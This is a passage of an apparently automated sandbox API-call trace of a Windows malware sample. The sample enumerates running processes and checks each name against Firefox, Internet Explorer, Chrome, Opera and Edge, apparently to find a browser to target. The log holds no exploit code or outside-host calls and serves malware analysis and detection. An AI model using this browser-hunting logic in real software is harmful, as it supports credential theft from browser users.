(lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.893] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.893] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.893] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.893] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.894] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.894] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.894] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.895] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.895] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.896] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.896] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.896] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.896] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0253.896] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0253.896] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0253.896] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0253.896] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.896] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.897] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.897] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.897] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.898] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0253.898] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0253.898] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0253.898] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0253.898] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.898] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.899] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0253.899] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0253.899] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0253.899] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0253.899] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.899] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.899] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0253.899] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0253.899] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0253.899] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0253.899] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.899] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.900] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.900] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.900] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.900] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.900] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.900] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.900] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0253.900] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0253.900] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0253.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0253.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.901] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0253.901] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0253.901] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0253.901] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0253.901] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0253.901] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.901] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0253.902] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0253.902] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0253.902] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0253.902] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0253.902] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.902] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0253.902] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0253.902] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0253.902] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0253.902] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0253.902] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.902] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0253.903] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0253.903] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0253.903] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0253.903] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0253.903] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.903] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0253.903] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0253.903] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0253.903] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0253.903] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0253.903] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.903] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0253.904] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0253.904] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0253.904] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0253.904] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0253.904] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.904] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0253.905] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0253.905] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0253.905] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0253.905] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0253.905] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.905] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0253.905] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0253.905] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0253.905] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0253.905] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0253.905] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.905] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0253.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0253.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0253.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0253.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0253.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.906] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0253.906] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0253.906] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0253.906] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0253.906] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0253.906] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.906] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0253.907] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0253.907] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0253.907] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0253.907] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0253.907] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.907] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0253.907] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0253.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0253.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0253.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0253.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.908] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0253.908] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0253.908] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0253.908] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0253.908] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0253.908] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.908] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0253.909] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0253.909] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0253.909] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0253.909] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0253.909] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.909] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0253.909] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0253.909] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0253.909] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0253.909] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0253.909] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.909] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0253.910] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0253.910] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0253.910] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0253.910] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0253.910] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.910] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0253.910] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0253.910] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0253.910] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0253.910] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0253.911] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0253.911] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0253.911] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0253.911] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0253.911] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0253.911] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0253.912] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0253.912] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0253.912] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0253.912] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0253.912] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.912] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0253.912] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0253.912] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0253.912] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0253.912] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0253.912] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.912] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0253.913] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0253.913] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0253.913] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0253.913] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0253.913] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.913] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.913] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0253.913] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0253.913] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0253.913] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0253.913] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.913] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.914] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.914] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.914] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.914] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.914] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.914] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.915] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0253.915] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0253.915] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0253.915] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0253.915] lstrcmpiA (lpString1="sppsvc.exe", 